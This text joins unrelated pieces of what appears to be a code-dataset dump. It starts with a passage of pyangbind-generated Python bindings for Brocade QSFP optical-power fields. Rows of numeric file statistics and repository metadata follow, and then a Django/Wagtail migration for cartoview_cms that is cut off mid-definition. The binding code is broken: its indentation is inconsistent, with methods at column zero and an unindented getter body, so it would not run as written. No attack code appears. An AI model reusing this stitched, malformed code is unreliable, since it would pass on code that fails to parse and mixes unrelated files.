    """
    Getter for the ``tx-power`` leaf (decimal64), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/tx_power.
    YANG description: the transmitted optical power (microWatts).

    :returns: the YANGDynClass-wrapped current value of the leaf.
    """
    return self.__tx_power
  def _set_tx_power(self, v, load=False):
    """
    Setter for the ``tx-power`` leaf (decimal64, 1 fractional digit), YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/tx_power.
    If this leaf is read-only (config: false) in the source YANG, this setter
    is considered private; backends populate it by calling
    thisObj._set_tx_power() directly.
    YANG description: the transmitted optical power (microWatts).

    :param v: new value; coerced into the generated precision-1 decimal type.
    :param load: not used in this method body; kept for generator API compatibility.
    :raises ValueError: if ``v`` cannot be coerced into a decimal64 value.
    """
    # Normalize values that already carry a YANG type converter.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="tx-power", rest_name="tx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """tx_power must be of a type compatible with decimal64""",
          'defined-type': "decimal64",
          'generated-type': """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="tx-power", rest_name="tx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)""",
        })
    self.__tx_power = t
    # Propagate the change upward via the _set hook, when the object has one.
    if hasattr(self, '_set'):
      self._set()
def _unset_tx_power(self):
    # Reset tx_power by replacing it with a freshly-constructed, empty
    # YANGDynClass instance carrying the same decimal64 restriction and
    # YANG metadata as the original default.
    self.__tx_power = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="tx-power", rest_name="tx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
def _get_rx_power(self):
"""
Getter method for rx_power, mapped from YANG variable /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/rx_power (decimal64)
YANG Description: This indicates the Received
optical power (microWatts)
"""
return self.__rx_power
def _set_rx_power(self, v, load=False):
    """Set the rx_power leaf (YANG decimal64).

    Mapped from the YANG path
    /brocade_interface_ext_rpc/get_media_detail/output/interface/qsfp/rx_power.
    If this variable is read-only (config: false) in the source YANG file,
    then _set_rx_power is considered a private method; backends looking to
    populate this variable should do so via calling
    thisObj._set_rx_power() directly.

    YANG Description: This indicates the Received
    optical power (microWatts)

    Raises ValueError (carrying a descriptive dict) when *v* cannot be
    coerced into the generated decimal64 type.
    """
    # Unwrap pyangbind "unified type" wrappers before validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the incoming value in the generated dynamic class so it is
        # validated against the decimal64 restriction and carries YANG metadata.
        wrapped = YANGDynClass(v, base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="rx-power", rest_name="rx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
    except (TypeError, ValueError):
        # Surface a uniform, structured error describing the expected type.
        raise ValueError({
            'error-string': """rx_power must be of a type compatible with decimal64""",
            'defined-type': "decimal64",
            'generated-type': """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="rx-power", rest_name="rx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)""",
        })
    self.__rx_power = wrapped
    # Notify the parent container (when one is attached) that a child changed.
    if hasattr(self, '_set'):
        self._set()
def _unset_rx_power(self):
    # Reset rx_power by replacing it with a freshly-constructed, empty
    # YANGDynClass instance carrying the same decimal64 restriction and
    # YANG metadata as the original default.
    self.__rx_power = YANGDynClass(base=RestrictedPrecisionDecimalType(precision=1), is_leaf=True, yang_name="rx-power", rest_name="rx-power", parent=self, choice=(u'interface-identifier', u'qsfp'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-interface-ext', defining_module='brocade-interface-ext', yang_type='decimal64', is_config=True)
# Expose each YANG leaf as a read/write property built from the generated
# getter/setter pairs (the tx_power/rx_power pairs are visible above; the
# others are presumably defined earlier in this class — typical for
# pyangbind-generated bindings). `__builtin__.property` refers to the
# Python 2 builtins module, which this generated file is assumed to import
# or alias at the top of the file.
speed = __builtin__.property(_get_speed, _set_speed)
connector = __builtin__.property(_get_connector, _set_connector)
encoding = __builtin__.property(_get_encoding, _set_encoding)
vendor_name = __builtin__.property(_get_vendor_name, _set_vendor_name)
vendor_oui = __builtin__.property(_get_vendor_oui, _set_vendor_oui)
vendor_pn = __builtin__.property(_get_vendor_pn, _set_vendor_pn)
vendor_rev = __builtin__.property(_get_vendor_rev, _set_vendor_rev)
distance = __builtin__.property(_get_distance, _set_distance)
media_form_factor = __builtin__.property(_get_media_form_factor, _set_media_form_factor)
wavelength = __builtin__.property(_get_wavelength, _set_wavelength)
serial_no = __builtin__.property(_get_serial_no, _set_serial_no)
date_code = __builtin__.property(_get_date_code, _set_date_code)
temperature = __builtin__.property(_get_temperature, _set_temperature)
voltage = __builtin__.property(_get_voltage, _set_voltage)
current = __builtin__.property(_get_current, _set_current)
tx_power = __builtin__.property(_get_tx_power, _set_tx_power)
rx_power = __builtin__.property(_get_rx_power, _set_rx_power)
# Maps each YANG `choice` node to the case branches and the leaves each
# branch governs; here the 'qsfp' case of 'interface-identifier' covers
# every leaf listed above.
__choices__ = {u'interface-identifier': {u'qsfp': [u'speed', u'connector', u'encoding', u'vendor_name', u'vendor_oui', u'vendor_pn', u'vendor_rev', u'distance', u'media_form_factor', u'wavelength', u'serial_no', u'date_code', u'temperature', u'voltage', u'current', u'tx_power', u'rx_power']}}
# Registry of every pyangbind-managed element in this container, keyed by
# the Python-safe leaf name and pointing at the property objects above.
_pyangbind_elements = {'speed': speed, 'connector': connector, 'encoding': encoding, 'vendor_name': vendor_name, 'vendor_oui': vendor_oui, 'vendor_pn': vendor_pn, 'vendor_rev': vendor_rev, 'distance': distance, 'media_form_factor': media_form_factor, 'wavelength': wavelength, 'serial_no': serial_no, 'date_code': date_code, 'temperature': temperature, 'voltage': voltage, 'current': current, 'tx_power': tx_power, 'rx_power': rx_power, }
| 79.844532
| 1,069
| 0.711759
| 8,154
| 60,602
| 5.060829
| 0.036546
| 0.069016
| 0.081956
| 0.041802
| 0.899651
| 0.886493
| 0.879804
| 0.865361
| 0.859836
| 0.837057
| 0
| 0.010818
| 0.142735
| 60,602
| 758
| 1,070
| 79.949868
| 0.783492
| 0.187898
| 0
| 0.501222
| 0
| 0.041565
| 0.394032
| 0.183989
| 0
| 0
| 0
| 0
| 0
| 1
| 0.132029
| false
| 0
| 0.01956
| 0
| 0.264059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b19b3cf30b24b17da3c6afb7acbea4da8e99dd8
| 157,223
|
py
|
Python
|
migrations/0010_auto_20220602_0753.py
|
cartologic/cartoview_cms
|
3f21a092c90db3d4560d69c1c2a6c7843b23ea0e
|
[
"BSD-2-Clause"
] | null | null | null |
migrations/0010_auto_20220602_0753.py
|
cartologic/cartoview_cms
|
3f21a092c90db3d4560d69c1c2a6c7843b23ea0e
|
[
"BSD-2-Clause"
] | null | null | null |
migrations/0010_auto_20220602_0753.py
|
cartologic/cartoview_cms
|
3f21a092c90db3d4560d69c1c2a6c7843b23ea0e
|
[
"BSD-2-Clause"
] | null | null | null |
# Generated by Django 2.2.24 on 2022-06-02 07:53
import cartoview_cms.models.streamfields.Blocks
import coderedcms.blocks.base_blocks
import coderedcms.blocks.html_blocks
from django.db import migrations
import wagtail.contrib.table_block.blocks
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.embeds.blocks
import wagtail.images.blocks
import wagtail.snippets.blocks
class Migration(migrations.Migration):
dependencies = [
('cartoview_cms', '0009_auto_20220526_1228'),
]
operations = [
migrations.AlterField(
model_name='genericmodule',
name='body',
field=wagtail.core.fields.StreamField([('hero', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(default=True, label='Full width', required=False)), ('is_parallax', wagtail.core.blocks.BooleanBlock(help_text='Background images scroll slower than foreground images, creating an illusion of depth.', label='Parallax Effect', required=False)), ('background_image', wagtail.images.blocks.ImageChooserBlock(required=False)), ('tile_image', wagtail.core.blocks.BooleanBlock(default=False, label='Tile background image', required=False)), ('background_color', wagtail.core.blocks.CharBlock(help_text='Hexadecimal, rgba, or CSS color notation (e.g. #ff0011)', label='Background color', max_length=255, required=False)), ('foreground_color', wagtail.core.blocks.CharBlock(help_text='Hexadecimal, rgba, or CSS color notation (e.g. 
#ff0011)', label='Text color', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('row', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('column_breakpoint', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Always expanded'), ('sm', 'sm - Expand on small screens (phone, 576px) and larger'), ('md', 'md - Expand on medium screens (tablet, 768px) and larger'), ('lg', 'lg - Expand on large screens (laptop, 992px) and larger'), ('xl', 'xl - Expand on extra large screens (wide monitor, 1200px)')], help_text='Screen size at which the column will expand horizontally or stack vertically.', required=False, verbose_name='Column Breakpoint'))])), ('column_size', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Automatically size'), ('12', 'Full row'), ('6', 'Half - 1/2 column'), ('4', 'Thirds - 1/3 column'), ('8', 'Thirds - 2/3 column'), ('3', 'Quarters - 1/4 column'), ('9', 'Quarters - 3/4 column'), ('2', 'Sixths - 1/6 column'), ('10', 'Sixths - 5/6 column'), ('1', 'Twelfths - 1/12 column'), ('5', 'Twelfths - 5/12 column'), ('7', 'Twelfths - 7/12 column'), ('11', 
'Twelfths - 11/12 column')], label='Column size', required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), 
('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), 
('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), 
('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, 
required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 
1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. 
Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))])), ('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', 
wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 
'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))])), ('carousel', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('carousel', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.Carousel'))])), ('modal', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), 
('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('header', wagtail.core.blocks.CharBlock(label='Modal heading', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), 
('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), 